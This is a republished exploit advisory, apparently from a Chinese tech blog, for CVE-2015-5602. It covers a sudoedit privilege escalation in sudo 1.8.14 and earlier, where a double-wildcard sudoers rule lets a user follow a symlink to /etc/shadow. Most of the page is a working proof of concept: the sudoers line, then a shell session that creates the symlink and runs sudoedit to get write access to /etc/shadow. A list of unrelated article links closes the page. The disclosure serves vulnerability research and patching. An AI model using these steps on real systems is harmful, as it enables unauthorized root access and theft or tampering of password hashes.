exploit - Sudo <=1.8.14 - Unauthorized Privilege
2015-08-06 16:15
281 查看
# Exploit Title: sudo -e - a.k.a. sudoedit - unauthorized privilege escalation # Date: 07-23-2015 # Exploit Author: Daniel Svartman # Version: Sudo <=1.8.14 # Tested on: RHEL 5/6/7 and Ubuntu (all versions) # CVE: CVE-2015-5602. Hello, I found a security bug in sudo (checked in the latest versions of sudo running on RHEL and ubuntu) when a user is granted with root access to modify a particular file that could be located in a subset of directories. It seems that sudoedit does not check the full path if a wildcard is used twice (e.g. /home/*/*/file.txt), allowing a malicious user to replace the file.txt real file with a symbolic link to a different location (e.g. /etc/shadow). I was able to perform such redirect and retrieve the data from the /etc/shadow file. In order for you to replicate this, you should configure the following line in your /etc/sudoers file: <user_to_grant_priv> ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt Then, logged as that user, create a subdirectory within its home folder (e.g. /home/<user_to_grant_priv>/newdir) and later create a symbolic link inside the new folder named test.txt pointing to /etc/shadow. When you run sudoedit /home/<user_to_grant_priv>/newdir/test.txt you will be allowed to access the /etc/shadow even if have not been granted with such access in the sudoers file. I checked this against fixed directories and files (not using a wildcard) and it does work with symbolic links created under the /home folder.
CREATE A NORMAL USER
-bash-3.2# useradd -b /home/ -c "normal user" -u 1000 -m -s /bin/bash -p password centos -bash-3.2# ls -l /home/ total 8 drwx------ 4 centos centos 4096 Aug 6 04:00 centos
MODIFY SUDER CONFIGURATION
centos ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt
PWN
-bash-3.2# su centos [centos@lab centos]$ pwd /home/centos [centos@lab centos]$ mkdir pwn [centos@lab centos]$ cd pwn/ [centos@lab pwn]$ ln -s /etc/shadow /home/centos/pwn/test.txt [centos@lab pwn]$ ls -l /home/centos/pwn/ total 4 lrwxrwxrwx 1 centos centos 11 Aug 6 04:04 test.txt -> /etc/shadow [centos@lab pwn]$ sudoedit /home/centos/pwn/test.txt
BINGO ! We can modify /etc/shadow now.
相关文章推荐
- 如何安装win10正式版?win10安装方法介绍
- 【Launcher 教程】从 URL Schemes 入门到用 Launcher 调用各效率软件
- JavaScript实现定时隐藏与显示图片的方法
- jquery全选
- 经典图论500题
- 配置环境变量 解决tomcat启动闪退现象
- 多线程2
- ZOJ 1671 Walking ant(bfs)
- sql联合查询inner join
- JDK各个版本的新特性jdk1.5-jdk8
- Android Data Binding高级用法-Observable、动态生成Binding Class(三)
- Implement Stack using Queues
- 使用Thread+Handler实现非UI线程更新UI界面
- apk反编译详解
- Num 22 : NYOJ : 0055 懒省事的小明 [ 优先队列 ]
- echarts 图表 展示 练习二 (ajax 后台加载数据)
- Codeforces Round #Pi (Div. 2)
- Android Data Binding高级用法-Observable、动态生成Binding Class(三)
- 翻转单链表
- C# 获得Excel工作簿Sheet页面(工作表)集合的名称